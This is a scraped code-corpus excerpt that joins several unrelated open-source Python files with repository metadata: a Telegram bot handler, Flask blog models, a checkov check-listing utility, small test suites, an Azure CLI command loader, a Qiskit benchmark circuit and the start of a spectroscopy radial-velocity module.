pass_update_queue (:obj:`bool`, optional): If set to ``True``, a keyword argument called
``update_queue`` will be passed to the callback function. It will be the ``Queue``
instance used by the :class:`telegram.ext.Updater` and :class:`telegram.ext.Dispatcher`
that contains new updates which can be used to insert updates. Default is ``False``.
DEPRECATED: Please switch to context based callbacks.
pass_job_queue (:obj:`bool`, optional): If set to ``True``, a keyword argument called
``job_queue`` will be passed to the callback function. It will be a
:class:`telegram.ext.JobQueue` instance created by the :class:`telegram.ext.Updater`
which can be used to schedule new jobs. Default is ``False``.
DEPRECATED: Please switch to context based callbacks.
pass_user_data (:obj:`bool`, optional): If set to ``True``, a keyword argument called
``user_data`` will be passed to the callback function. Default is ``False``.
DEPRECATED: Please switch to context based callbacks.
pass_chat_data (:obj:`bool`, optional): If set to ``True``, a keyword argument called
``chat_data`` will be passed to the callback function. Default is ``False``.
DEPRECATED: Please switch to context based callbacks.
"""
def check_update(self, update):
"""Determines whether an update should be passed to this handlers :attr:`callback`.
Args:
update (:class:`telegram.Update`): Incoming telegram update.
Returns:
:obj:`bool`
"""
return isinstance(update, Update) and update.chosen_inline_result
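A hedged registration sketch for this handler, assuming a python-telegram-bot release (v12.x) where the context-based callbacks mentioned in the docstring are available; the token below is a format-valid placeholder, not a real bot token:
from telegram.ext import Updater

def on_chosen_result(update, context):
    # fires when a user picks one of the bot's inline results
    print(update.chosen_inline_result.result_id)

updater = Updater("123456:PLACEHOLDER-TOKEN", use_context=True)
updater.dispatcher.add_handler(ChosenInlineResultHandler(on_chosen_result))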
| 49.931034
| 99
| 0.683702
|
a6d3574085f276b565fe3d9b7dfcec63e52b2ab7
| 1,662
|
py
|
Python
|
flaskblog/models.py
|
oecorrechag/ProyectoM
|
e21acfc44c566e9030b2931c7b450da9bcc1b19d
|
[
"MIT"
] | null | null | null |
flaskblog/models.py
|
oecorrechag/ProyectoM
|
e21acfc44c566e9030b2931c7b450da9bcc1b19d
|
[
"MIT"
] | null | null | null |
flaskblog/models.py
|
oecorrechag/ProyectoM
|
e21acfc44c566e9030b2931c7b450da9bcc1b19d
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from flask import current_app
from flaskblog import db, login_manager
from flask_login import UserMixin
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(20), unique=True, nullable=False)
email = db.Column(db.String(120), unique=True, nullable=False)
image_file = db.Column(db.String(20), nullable=False, default='default.jpg')
password = db.Column(db.String(60), nullable=False)
posts = db.relationship('Post', backref='author', lazy=True)
def get_reset_token(self, expires_sec=1800):
        s = Serializer(current_app.config['SECRET_KEY'], expires_sec)
return s.dumps({'user_id': self.id}).decode('utf-8')
@staticmethod
def verify_reset_token(token):
        s = Serializer(current_app.config['SECRET_KEY'])
try:
user_id = s.loads(token)['user_id']
except:
return None
return User.query.get(user_id)
def __repr__(self):
return f"User('{self.username}', '{self.email}', '{self.image_file}')"
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(100), nullable=False)
date_posted = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
content = db.Column(db.Text, nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
def __repr__(self):
return f"Post('{self.title}', '{self.date_posted}')"
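A hedged round-trip of the reset-token helpers above; it assumes an active Flask application context (so ``current_app`` resolves) and at least one user row in the database:
user = User.query.first()
token = user.get_reset_token(expires_sec=600)
# the token resolves back to the same user until it expires
assert User.verify_reset_token(token).id == user.id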
| 35.361702
| 81
| 0.690734
|
3f02ff84a26d33492b748b602335c14e59efc7ee
| 5,753
|
py
|
Python
|
checkov/common/util/docs_generator.py
|
jamesholland-uk/checkov
|
d73fd4bd7096d48ab3434a92a177bcc55605460a
|
[
"Apache-2.0"
] | null | null | null |
checkov/common/util/docs_generator.py
|
jamesholland-uk/checkov
|
d73fd4bd7096d48ab3434a92a177bcc55605460a
|
[
"Apache-2.0"
] | null | null | null |
checkov/common/util/docs_generator.py
|
jamesholland-uk/checkov
|
d73fd4bd7096d48ab3434a92a177bcc55605460a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import re
from typing import List, Optional, Tuple, Union
from tabulate import tabulate
from checkov.arm.registry import arm_resource_registry, arm_parameter_registry
from checkov.bicep.checks.param.registry import registry as bicep_param_registry
from checkov.bicep.checks.resource.registry import registry as bicep_resource_registry
from checkov.bitbucket.registry import registry as bitbucket_configuration_registry
from checkov.cloudformation.checks.resource.registry import cfn_registry as cfn_registry
from checkov.common.checks.base_check_registry import BaseCheckRegistry
from checkov.common.checks_infra.registry import BaseRegistry as BaseGraphRegistry, get_graph_checks_registry
from checkov.dockerfile.registry import registry as dockerfile_registry
from checkov.github.registry import registry as github_configuration_registry
from checkov.github_actions.checks.job_registry import registry as github_actions_jobs_registry
from checkov.gitlab.registry import registry as gitlab_configuration_registry
from checkov.kubernetes.checks.resource.registry import registry as k8_registry
from checkov.secrets.runner import CHECK_ID_TO_SECRET_TYPE
from checkov.serverless.registry import sls_registry
from checkov.terraform.checks.data.registry import data_registry
from checkov.terraform.checks.module.registry import module_registry
from checkov.terraform.checks.provider.registry import provider_registry
from checkov.terraform.checks.resource.registry import resource_registry
ID_PARTS_PATTERN = re.compile(r'([^_]*)_([^_]*)_(\d+)')
def get_compare_key(c):
res = []
for match in ID_PARTS_PATTERN.finditer(c[0]):
ckv, framework, number = match.groups()
numeric_value = int(number) if number else 0
# count number of leading zeros
same_number_ordering = len(number) - len(number.lstrip('0'))
res.append((framework, ckv, numeric_value, same_number_ordering, c[2]))
return res
def print_checks(frameworks: Optional[List[str]] = None, use_bc_ids: bool = False) -> None:
framework_list = frameworks if frameworks else ["all"]
printable_checks_list = get_checks(framework_list, use_bc_ids=use_bc_ids)
print(
tabulate(printable_checks_list, headers=["Id", "Type", "Entity", "Policy", "IaC"], tablefmt="github",
showindex=True))
print("\n\n---\n\n")
def get_checks(frameworks: Optional[List[str]] = None, use_bc_ids: bool = False) -> \
List[Tuple[str, str, str, str, str]]:
framework_list = frameworks if frameworks else ["all"]
printable_checks_list = []
def add_from_repository(registry: Union[BaseCheckRegistry, BaseGraphRegistry], checked_type: str, iac: str) -> None:
nonlocal printable_checks_list
if isinstance(registry, BaseCheckRegistry):
for entity, check in registry.all_checks():
printable_checks_list.append((check.get_output_id(use_bc_ids), checked_type, entity, check.name, iac))
elif isinstance(registry, BaseGraphRegistry):
for check in registry.checks:
for rt in check.resource_types:
printable_checks_list.append((check.get_output_id(use_bc_ids), checked_type, rt, check.name, iac))
if any(x in framework_list for x in ("all", "terraform")):
add_from_repository(resource_registry, "resource", "Terraform")
add_from_repository(data_registry, "data", "Terraform")
add_from_repository(provider_registry, "provider", "Terraform")
add_from_repository(module_registry, "module", "Terraform")
graph_registry = get_graph_checks_registry("terraform")
graph_registry.load_checks()
add_from_repository(graph_registry, "resource", "Terraform")
if any(x in framework_list for x in ("all", "cloudformation")):
add_from_repository(cfn_registry, "resource", "Cloudformation")
if any(x in framework_list for x in ("all", "kubernetes")):
add_from_repository(k8_registry, "resource", "Kubernetes")
if any(x in framework_list for x in ("all", "serverless")):
add_from_repository(sls_registry, "resource", "serverless")
if any(x in framework_list for x in ("all", "dockerfile")):
add_from_repository(dockerfile_registry, "dockerfile", "dockerfile")
if any(x in framework_list for x in ("all", "github_configuration")):
add_from_repository(github_configuration_registry, "github_configuration", "github_configuration")
if any(x in framework_list for x in ("all", "github_actions")):
add_from_repository(github_actions_jobs_registry, "jobs", "github_actions")
if any(x in framework_list for x in ("all", "gitlab_configuration")):
add_from_repository(gitlab_configuration_registry, "gitlab_configuration", "gitlab_configuration")
if any(x in framework_list for x in ("all", "bitbucket_configuration")):
add_from_repository(bitbucket_configuration_registry, "bitbucket_configuration", "bitbucket_configuration")
if any(x in framework_list for x in ("all", "arm")):
add_from_repository(arm_resource_registry, "resource", "arm")
add_from_repository(arm_parameter_registry, "parameter", "arm")
if any(x in framework_list for x in ("all", "bicep")):
add_from_repository(bicep_param_registry, "parameter", "Bicep")
add_from_repository(bicep_resource_registry, "resource", "Bicep")
if any(x in framework_list for x in ("all", "secrets")):
for check_id, check_type in CHECK_ID_TO_SECRET_TYPE.items():
printable_checks_list.append((check_id, check_type, "secrets", check_type, "secrets"))
return sorted(printable_checks_list, key=get_compare_key)
if __name__ == '__main__':
print_checks()
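A hedged usage sketch of ``get_checks``: restrict the listing to Terraform and print a few rows (this requires a checkov installation so the imported registries are populated):
terraform_checks = get_checks(["terraform"], use_bc_ids=False)
print(len(terraform_checks), "checks")
for check_id, checked_type, entity, policy, iac in terraform_checks[:5]:
    print(check_id, checked_type, entity, "-", policy)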
| 55.317308
| 120
| 0.746046
|
f8b0b35c09c785b08cc76fff5d91f8b138396f08
| 982
|
py
|
Python
|
tests/test_json.py
|
JoshKarpel/iax
|
3f28ba2f94eb373b02ea080955f33681c951578c
|
[
"MIT"
] | null | null | null |
tests/test_json.py
|
JoshKarpel/iax
|
3f28ba2f94eb373b02ea080955f33681c951578c
|
[
"MIT"
] | null | null | null |
tests/test_json.py
|
JoshKarpel/iax
|
3f28ba2f94eb373b02ea080955f33681c951578c
|
[
"MIT"
] | null | null | null |
import datetime
import random
import pytest
from ix import ix
def test_to_jsons():
@ix
class JSON:
a: int
b: float
d: str
e: bool
jsons = [
JSON(0, 1.8, 'hi', True),
JSON(2, 5.3, 'lo', False),
JSON(-10, -4.2, 'foo', True),
]
expected = '[{"a": 0, "b": 1.8, "d": "hi", "e": true}, {"a": 2, "b": 5.3, "d": "lo", "e": false}, {"a": -10, "b": -4.2, "d": "foo", "e": true}]'
assert JSON.to_jsons(jsons) == expected
def test_nested_to_jsons():
@ix
class Inner:
a: int
@ix
class Outer:
inner: Inner
obj = [Outer(Inner(5))]
expected = '[{"inner": {"a": 5}}]'
assert Outer.to_jsons(obj) == expected
def test_load_nested_jsons():
@ix
class Inner:
a: int
@ix
class Outer:
inner: Inner
obj = [Outer(Inner(5))]
jsons = Outer.to_jsons(obj)
loaded = list(Outer.from_jsons(jsons))
assert loaded[0] == obj[0]
| 16.931034
| 148
| 0.5
|
b3ddffb8f2869b82f5a9c1b1b8c9bb343758e5f4
| 857
|
py
|
Python
|
src/command_modules/azure-cli-configure/azure/cli/command_modules/configure/commands.py
|
kristapratico/azure-cli
|
00d4ce5caed40758d4a13c428a28583d10c155cf
|
[
"MIT"
] | null | null | null |
src/command_modules/azure-cli-configure/azure/cli/command_modules/configure/commands.py
|
kristapratico/azure-cli
|
00d4ce5caed40758d4a13c428a28583d10c155cf
|
[
"MIT"
] | null | null | null |
src/command_modules/azure-cli-configure/azure/cli/command_modules/configure/commands.py
|
kristapratico/azure-cli
|
00d4ce5caed40758d4a13c428a28583d10c155cf
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.commands import CliCommandType
def load_command_table(self, _):
configure_custom = CliCommandType(operations_tmpl='azure.cli.command_modules.configure.custom#{}')
with self.command_group('', configure_custom) as g:
g.command('configure', 'handle_configure')
with self.command_group('cache', configure_custom) as g:
g.command('list', 'list_cache_contents')
g.command('show', 'show_cache_contents')
g.command('delete', 'delete_cache_contents')
| 42.85
| 102
| 0.572929
|
71fa1053686b34be41af7c3ac5cc774b88081e14
| 4,036
|
py
|
Python
|
benchmark/startQiskit_noisy1011.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startQiskit_noisy1011.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startQiskit_noisy1011.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
# qubit number=5
# total number=41
import cirq
import qiskit
from qiskit.providers.aer import QasmSimulator
from qiskit.test.mock import FakeVigo
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[0]) # number=3
prog.h(input_qubit[1]) # number=4
prog.h(input_qubit[2]) # number=5
prog.h(input_qubit[3]) # number=6
prog.h(input_qubit[4]) # number=21
prog.cx(input_qubit[3],input_qubit[0]) # number=32
prog.z(input_qubit[3]) # number=33
prog.cx(input_qubit[3],input_qubit[0]) # number=34
prog.rx(0.11938052083641225,input_qubit[1]) # number=36
Zf = build_oracle(n, f)
repeat = floor(sqrt(2 ** n) * pi / 4)
for i in range(repeat):
prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
prog.h(input_qubit[0]) # number=1
prog.rx(1.4765485471872026,input_qubit[2]) # number=35
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.cx(input_qubit[1],input_qubit[0]) # number=38
prog.x(input_qubit[0]) # number=39
prog.cx(input_qubit[1],input_qubit[0]) # number=40
prog.x(input_qubit[4]) # number=30
prog.x(input_qubit[1]) # number=10
prog.x(input_qubit[2]) # number=11
prog.rx(-2.5258404934861938,input_qubit[1]) # number=25
prog.h(input_qubit[3]) # number=29
prog.cx(input_qubit[0],input_qubit[3]) # number=22
prog.x(input_qubit[3]) # number=23
prog.cx(input_qubit[0],input_qubit[3]) # number=24
if n>=2:
prog.mcu1(pi,input_qubit[1:],input_qubit[0])
prog.x(input_qubit[0]) # number=13
prog.rx(-0.0722566310325653,input_qubit[4]) # number=37
prog.x(input_qubit[1]) # number=14
prog.cx(input_qubit[0],input_qubit[2]) # number=26
prog.x(input_qubit[2]) # number=27
prog.cx(input_qubit[0],input_qubit[2]) # number=28
prog.x(input_qubit[3]) # number=16
prog.h(input_qubit[0]) # number=17
prog.h(input_qubit[1]) # number=18
prog.h(input_qubit[2]) # number=19
prog.h(input_qubit[3]) # number=20
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
key = "00000"
f = lambda rep: str(int(rep == key))
prog = make_circuit(5,f)
backend = FakeVigo()
sample_shot =7924
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_noisy1011.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| 31.53125
| 82
| 0.61893
|
e5b009d0d07e01f4929836786ce1cb730508c633
| 3,506
|
py
|
Python
|
tests/test_eta_3_simple.py
|
Robpol86/etaprogress
|
224e8a248c2bf820bad218763281914ad3983fff
|
[
"MIT"
] | 13
|
2015-08-25T05:54:21.000Z
|
2021-03-23T15:56:58.000Z
|
tests/test_eta_3_simple.py
|
Robpol86/etaprogress
|
224e8a248c2bf820bad218763281914ad3983fff
|
[
"MIT"
] | 5
|
2015-03-14T16:31:38.000Z
|
2019-01-13T20:46:25.000Z
|
tests/test_eta_3_simple.py
|
Robpol86/etaprogress
|
224e8a248c2bf820bad218763281914ad3983fff
|
[
"MIT"
] | 5
|
2015-05-31T14:16:50.000Z
|
2021-02-06T11:23:43.000Z
|
from etaprogress import eta
def test_one():
eta_instance = eta.ETA(1)
eta._NOW = lambda: 1411868722.680839
eta_instance.set_numerator(1)
assert 1 == eta_instance.denominator
assert eta_instance.eta_epoch is None
assert 0.0 == eta_instance.rate
assert 1 == eta_instance.numerator
assert eta_instance.stalled is True
assert eta_instance.started is False
assert eta_instance.undefined is False
assert eta_instance.done is True
assert eta_instance.eta_seconds is None
assert 100.0 == eta_instance.percent
assert 0.0 == eta_instance.elapsed
def test_two():
eta_instance = eta.ETA(2)
eta._NOW = lambda: 1411868721.680839
eta_instance.set_numerator(1)
assert 2 == eta_instance.denominator
assert eta_instance.eta_epoch is None
assert 0.0 == eta_instance.rate
assert 1 == eta_instance.numerator
assert eta_instance.stalled is True
assert eta_instance.started is False
assert eta_instance.undefined is False
assert eta_instance.done is False
assert eta_instance.eta_seconds is None
assert 50.0 == eta_instance.percent
assert 0.0 == eta_instance.elapsed
eta._NOW = lambda: 1411868722.680839
eta_instance.set_numerator(2)
assert 2 == eta_instance.denominator
assert 2 == eta_instance.numerator
assert eta_instance.started is True
assert eta_instance.undefined is False
assert eta_instance.done is True
assert 100.0 == eta_instance.percent
def test_five():
eta._NOW = lambda: 1411868720.680839
eta_instance = eta.ETA(5)
eta._NOW = lambda: 1411868721.680839
eta_instance.set_numerator(1)
assert 5 == eta_instance.denominator
assert eta_instance.eta_epoch is None
assert 0.0 == eta_instance.rate
assert 1 == eta_instance.numerator
assert eta_instance.stalled is True
assert eta_instance.started is False
assert eta_instance.undefined is False
assert eta_instance.done is False
assert eta_instance.eta_seconds is None
assert 20.0 == eta_instance.percent
assert 0.0 == eta_instance.elapsed
eta._NOW = lambda: 1411868722.680839
eta_instance.set_numerator(2)
assert 5 == eta_instance.denominator
assert 1411868725.680839 == eta_instance.eta_epoch
assert 1.0 == eta_instance.rate
assert 2 == eta_instance.numerator
assert eta_instance.stalled is False
assert eta_instance.started is True
assert eta_instance.undefined is False
assert eta_instance.done is False
assert 3.0 == eta_instance.eta_seconds
assert 40.0 == eta_instance.percent
assert 2.0 == eta_instance.elapsed
eta._NOW = lambda: 1411868723.680839
eta_instance.set_numerator(3)
assert 5 == eta_instance.denominator
assert 1411868725.680839 == eta_instance.eta_epoch
assert 1.0 == eta_instance.rate
assert 3 == eta_instance.numerator
assert eta_instance.stalled is False
assert eta_instance.started is True
assert eta_instance.undefined is False
assert eta_instance.done is False
assert 2.0 == eta_instance.eta_seconds
assert 60.0 == eta_instance.percent
assert 3.0 == eta_instance.elapsed
eta._NOW = lambda: 1411868725.680839
eta_instance.set_numerator(5)
assert 5 == eta_instance.denominator
assert 5 == eta_instance.numerator
assert eta_instance.started is True
assert eta_instance.undefined is False
assert eta_instance.done is True
assert 100.0 == eta_instance.percent
assert 5.0 == eta_instance.elapsed
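Outside these tests (which freeze time by patching ``eta._NOW``), the same API runs against the wall clock; a hedged sketch:
import time

progress = eta.ETA(5)
for done in range(1, 6):
    time.sleep(0.01)
    progress.set_numerator(done)
print(progress.percent, progress.done, round(progress.elapsed, 2))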
| 33.711538
| 54
| 0.736737
|
e14320e18a07497f6d86105edc01d72f6fb68b18
| 145,198
|
py
|
Python
|
doppler/rv.py
|
dnidever/radvel
|
7e97ee6537b69bfd4bde7e30d8b3639b00507163
|
[
"MIT"
] | null | null | null |
doppler/rv.py
|
dnidever/radvel
|
7e97ee6537b69bfd4bde7e30d8b3639b00507163
|
[
"MIT"
] | null | null | null |
doppler/rv.py
|
dnidever/radvel
|
7e97ee6537b69bfd4bde7e30d8b3639b00507163
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""RV.PY - Generic Radial Velocity Software
"""
from __future__ import print_function
__authors__ = 'David Nidever <dnidever@montana.edu>'
__version__ = '20210605' # yyyymmdd
import os
#import sys, traceback
import contextlib, io, sys
import numpy as np
import warnings
from astropy.io import fits
from astropy.table import Table
import astropy.units as u
from astropy.time import Time
from astropy.coordinates import SkyCoord, EarthLocation
from astropy.wcs import WCS
from scipy.ndimage.filters import median_filter,gaussian_filter1d
from dlnpyutils.minpack import curve_fit
from scipy.optimize import least_squares
from scipy.interpolate import interp1d
import thecannon as tc
from dlnpyutils import utils as dln, bindata
from .spec1d import Spec1D
from . import (cannon,payne,utils,reader)
import copy
import emcee
import corner
import logging
import time
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib.legend import Legend
import subprocess
try:
import __builtin__ as builtins # Python 2
except ImportError:
import builtins # Python 3
# Ignore these warnings, it's a bug
warnings.filterwarnings("ignore", message="numpy.dtype size changed")
warnings.filterwarnings("ignore", message="numpy.ufunc size changed")
cspeed = 2.99792458e5 # speed of light in km/s
def xcorr_dtype(nlag):
"""Return the dtype for the xcorr structure"""
dtype = np.dtype([("xshift0",float),("ccp0",float),("xshift",float),("xshifterr",float),
("xshift_interp",float),("ccf",(float,nlag)),("ccferr",(float,nlag)),("ccnlag",int),
("cclag",(int,nlag)),("ccpeak",float),("ccpfwhm",float),("ccp_pars",(float,4)),
("ccp_perror",(float,4)),("ccp_polycoef",(float,4)),("vrel",float),
("vrelerr",float),("w0",float),("dw",float),("chisq",float)])
return dtype
# astropy.modeling can handle errors and constraints
# https://stackoverflow.com/questions/2828953/silence-the-stdout-of-a-function-in-python-without-trashing-sys-stdout-and-resto
# usage:
# with mute():
# foo()
@contextlib.contextmanager
def mute():
'''Prevent print to stdout, but if there was an error then catch it and
print the output before raising the error.'''
saved_stdout = sys.stdout
saved_stderr = sys.stderr
sys.stdout = io.StringIO()
sys.stderr = io.StringIO()
try:
yield
except Exception:
saved_output = sys.stdout
saved_outerr = sys.stderr
sys.stdout = saved_stdout
sys.stderr = saved_stderr
print(saved_output.getvalue())
print(saved_outerr.getvalue())
raise
sys.stdout = saved_stdout
sys.stderr = saved_stderr
def tweakcontinuum(spec,model,smlen=None,usepoly=False,polyorder=3):
""" Tweak the continuum normalization of an observed spectrum using a good-fit model."""
if smlen is None:
smlen = spec.npix/10.0
if hasattr(spec,'cont') is False:
spec.cont = spec.flux.copy()*0+1
# Loop over orders
for i in range(spec.norder):
if spec.norder==1:
ratio = spec.flux/model.flux
mask = spec.mask
gd,ngd,bd,nbd = dln.where((mask==False) & (spec.flux>0) & np.isfinite(spec.flux),comp=True)
else:
ratio = spec.flux[:,i]/model.flux[:,i]
mask = spec.mask[:,i]
gd,ngd,bd,nbd = dln.where((mask==False) & (spec.flux[:,i]>0) & np.isfinite(spec.flux[:,i]),comp=True)
# Set bad pixels to NaN, gsmooth masks those out
if nbd>0:
ratio[bd] = np.nan
        ratio[0] = np.nanmedian(ratio[0:int(smlen/2)])
        ratio[-1] = np.nanmedian(ratio[-int(smlen/2):-1])
# Use Gaussian Smoothing
if usepoly is False:
sm = dln.gsmooth(ratio,smlen,boundary='extend')
        # Use low-order polynomial
else:
x = np.linspace(-1,1,spec.npix)
coef = dln.poly_fit(x[gd],ratio[gd]-1,polyorder)
sm = dln.poly(x,coef)+1
# Deal with any remaining NaNs
bd, = np.where(np.isfinite(sm)==False)
if len(bd)>0:
sm[bd] = 1.0
if spec.norder==1:
spec.cont *= sm
spec.flux /= sm
spec.err /= sm
else:
spec.cont[:,i] *= sm
spec.flux[:,i] /= sm
spec.err[:,i] /= sm
return spec
def specfigure(figfile,spec,fmodel,out,annotlabels=None,original=None,verbose=True,figsize=10,ispayne=False):
"""
Make diagnostic figure.
Parameters
----------
figfile : str
Output figure filename.
spec : Spec1D object
The observed spectrum used for the fitting (normalized, masked and tweaked).
fmodel : Spec1D object
The best-fitting model (Cannon or Payne) spectrum.
out : numpy structured array
Catalog of best-fitting values to use for the annotation.
annotlabels : list, optional
The list of labels to use for the annotation. Default is ['teff','logg','feh','vrel'].
original : Spec1D object, optional
The original but normalized spectrum. Not tweaked or masked.
verbose : boolean, optional
Verbose output. Default is True.
figsize : float, optional
Figure size to use. Default is 10 inches.
ispayne: boolean, optional
Is this a Payne model. Default is False.
Returns
-------
Figure is saved to figfile.
Example
-------
.. code-block:: python
specfigure(figfile,specm,fmodel,out,original=orig,verbose=True,ispayne=True,annotlabels=annotlabels)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
if annotlabels is None:
annotlabels = ['teff','logg','feh','vrel']
#import matplotlib
matplotlib.use('Agg')
#import matplotlib.pyplot as plt
if os.path.exists(figfile): os.remove(figfile)
norder = spec.norder
nlegcol = 2
if original is not None: nlegcol=3
# Single-order plot
if norder==1:
fig,ax = plt.subplots()
fig.set_figheight(figsize*0.5)
fig.set_figwidth(figsize)
if original is not None:
plt.plot(original.wave,original.flux,color='green',label='Original',linewidth=1)
plt.plot(spec.wave,spec.flux,'b',label='Masked Data',linewidth=1)
plt.plot(fmodel.wave,fmodel.flux,'r',label='Model',linewidth=1,alpha=0.8)
leg = ax.legend(loc='upper left', frameon=True, framealpha=0.8, ncol=nlegcol)
plt.xlabel('Wavelength (Angstroms)')
plt.ylabel('Normalized Flux')
xr = dln.minmax(spec.wave)
yr = [np.min([spec.flux,fmodel.flux]), np.max([spec.flux,fmodel.flux])]
if original is not None:
yr = [np.min([original.flux,spec.flux,fmodel.flux]), np.max([spec.flux,fmodel.flux])]
yr = [yr[0]-dln.valrange(yr)*0.15,yr[1]+dln.valrange(yr)*0.005]
yr = [np.max([yr[0],-0.2]), np.min([yr[1],2.0])]
plt.xlim(xr)
plt.ylim(yr)
snr = np.nanmedian(spec.flux/spec.err)
plt.title(spec.filename)
if ispayne is False:
ax.annotate(r'S/N=%5.1f Teff=%5.1f$\pm$%5.1f logg=%5.2f$\pm$%5.2f [Fe/H]=%5.2f$\pm$%5.2f Vrel=%5.2f$\pm$%5.2f chisq=%5.2f' %
(snr, out['teff'], out['tefferr'], out['logg'], out['loggerr'], out['feh'], out['feherr'], out['vrel'], out['vrelerr'], out['chisq']),
xy=(np.mean(xr), yr[0]+dln.valrange(yr)*0.05),ha='center')
else:
fmt = r'S/N=%5.1f '
annotarr = [snr]
for k,name in enumerate(annotlabels):
                fmt += name+r'=%5.1f$\pm$%5.1f '
annotarr += [dln.first_el(out[name]),dln.first_el(out[name+'err'])]
fmt += r' chisq=%5.2f'
annotarr += [dln.first_el(out['chisq'])]
ax.annotate(fmt % tuple(annotarr), xy=(np.mean(xr), yr[0]+dln.valrange(yr)*0.05),ha='center')
# Multi-order plot
else:
fig,ax = plt.subplots(norder)
fig.set_figheight(figsize)
fig.set_figwidth(figsize)
for i in range(norder):
if original is not None:
ax[i].plot(original.wave[:,i],original.flux[:,i],color='green',label='Original',linewidth=1)
ax[i].plot(spec.wave[:,i],spec.flux[:,i],'b',label='Masked Data',linewidth=1)
ax[i].plot(fmodel.wave[:,i],fmodel.flux[:,i],'r',label='Model',linewidth=1,alpha=0.8)
if i==0:
leg = ax[i].legend(loc='upper left', frameon=True, framealpha=0.8, ncol=nlegcol)
ax[i].set_xlabel('Wavelength (Angstroms)')
ax[i].set_ylabel('Normalized Flux')
xr = dln.minmax(spec.wave[:,i])
yr = [np.min([spec.flux[:,i],fmodel.flux[:,i]]), np.max([spec.flux[:,i],fmodel.flux[:,i]])]
if original is not None:
yr = [np.min([original.flux[:,i],spec.flux[:,i],fmodel.flux[:,i]]), np.max([spec.flux[:,i],fmodel.flux[:,i]])]
yr = [yr[0]-dln.valrange(yr)*0.05,yr[1]+dln.valrange(yr)*0.05]
if i==0:
yr = [yr[0]-dln.valrange(yr)*0.15,yr[1]+dln.valrange(yr)*0.05]
yr = [np.max([yr[0],-0.2]), np.min([yr[1],2.0])]
ax[i].set_xlim(xr)
ax[i].set_ylim(yr)
# legend
if i==0:
snr = np.nanmedian(spec.flux/spec.err)
ax[i].set_title(spec.filename)
if ispayne is False:
ax[i].annotate(r'S/N=%5.1f Teff=%5.1f$\pm$%5.1f logg=%5.2f$\pm$%5.2f [Fe/H]=%5.2f$\pm$%5.2f Vrel=%5.2f$\pm$%5.2f chisq=%5.2f' %
(snr,out['teff'],out['tefferr'],out['logg'],out['loggerr'],out['feh'],out['feherr'],out['vrel'],out['vrelerr'],out['chisq']),
xy=(np.mean(xr), yr[0]+dln.valrange(yr)*0.05),ha='center')
else:
fmt = r'S/N=%5.1f '
annotarr = [snr]
for k,name in enumerate(annotlabels):
                        fmt += name+r'=%5.1f$\pm$%5.1f '
annotarr += [dln.first_el(out[name]),dln.first_el(out[name+'err'])]
fmt += r' chisq=%5.2f'
annotarr += [dln.first_el(out['chisq'])]
ax[i].annotate(fmt % tuple(annotarr), xy=(np.mean(xr), yr[0]+dln.valrange(yr)*0.05),ha='center')
plt.savefig(figfile,bbox_inches='tight')
plt.close(fig)
if verbose is True: print('Figure saved to '+figfile)
def ccorrelate(x, y, lag, yerr=None, covariance=False, double=None, nomean=False):
"""This function computes the cross correlation of two samples.
This function computes the cross correlation Pxy(L) or cross
covariance Rxy(L) of two sample populations X and Y as a function
of the lag (L).
This was translated from APC_CORRELATE.PRO which was itself a
modification to the IDL C_CORRELATE.PRO function.
Parameters
----------
x : array
The first array to cross correlate (e.g., the template). If y is 2D
(e.g., [Npix,Norder]), then x can be either 2D or 1D. If x is 1D, then
the cross-correlation is performed between x and each order of y and
a 2D array will be output. If x is 2D, then the cross-correlation
of each order of x and y is performed and the results combined.
y : array
        The second array to cross correlate. Must be the same length as x.
Can be 2D (e.g., [Npix, Norder]), but the shifting is always done
on the 1st dimension.
lag : array
Vector that specifies the absolute distance(s) between
